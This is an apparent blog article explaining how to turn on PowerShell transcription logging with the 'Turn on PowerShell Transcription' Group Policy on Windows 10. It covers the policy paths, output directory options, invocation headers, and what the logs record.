- Log PowerShell command outputs with Group Policy - Fri, Oct 16 2015
- PowerShell script to create local user accounts or local groups - Tue, Oct 13 2015
- How to display a pop-up message box with PowerShell - Wed, Sep 30 2015
Have you ever wanted to track or log usage of PowerShell on a given computer? This requirement might come up very soon, be it for troubleshooting or investigation purposes. This article will talk about how to achieve this on a Windows 10 computer. The approach discussed in this article is available in PowerShell v5 (currently in Preview), which comes with Windows 10 by default. For other operating systems, you need to upgrade the versions to PowerShell v5.
This concept of tracking commands, scripts, and cmdlets executed from a PowerShell window is not new. You can do so using the Start-Transcript cmdlet by manually running the cmdlet for each PowerShell session launched. These details are logged to a text file. However, this method is session-based, and logging doesn’t work until Start-Transcript is run. The cmdlet will also not tell you the user account executing the commands, the timestamp, etc.
To address these gaps, a Group Policy is introduced that works for PowerShell v5. This Group Policy helps track PowerShell usage without the need to use the Start-Transcript cmdlet. Let’s see more details about this policy and what kind of output it provides.
The name of the Group Policy is Turn on PowerShell Transcription. This policy is available under User Configuration as well as Computer Configuration. Based on your requirements and the GPOs set up in your organization, you can configure the policy at either place. Below are the full paths to the GPO setting. Note that Computer Policy takes precedence over User Policy for this setting.
Computer Policy: Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Transcription
User Policy: User Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Transcription
You can create a domain-level Group Policy or modify the Local Group Policy to configure this setting on a computer that is running Windows 10.
Below is the preview of the Group Policy. By default, it is not configured. You must enable it if you want logging functionality. Transcript output directory and Include invocation headers are optional.
Turn on PowerShell Transcription
When this policy is enabled, by default it creates the logging file in the user’s Documents folder. It will create a folder with date details (YYYYMMDD) and create the text files inside that. The contents of the text file appear similar to below. As you can see in the output, it contains the user name, RunAs User (in case of impersonation), PID of the process, start time, and other version details.
If you want to store these files in some other directory, you can use the Transcript output directory option in Group Policy to specify the path. Do not use environmental variables such as %temp%; they will not work.
If you want to have a time stamp for each command that is executed through PowerShell, you can select the Include invocation headers check box in Group Policy. This will add the date and time when that command was executed. The output looks similar to the following when you enable this option.
Invocation headers included
This group policy does nothing but start Start-Transcript functionality whenever a new PowerShell session is launched. It is completely transparent to the users launching PowerShell; they don’t even know that this is being tracked. This works not just for the PowerShell command prompt and PowerShell ISE but also the invocation of PowerShell runspaces through a C# program. That means you can track pretty much anything that is being executed using Windows PowerShell Engine.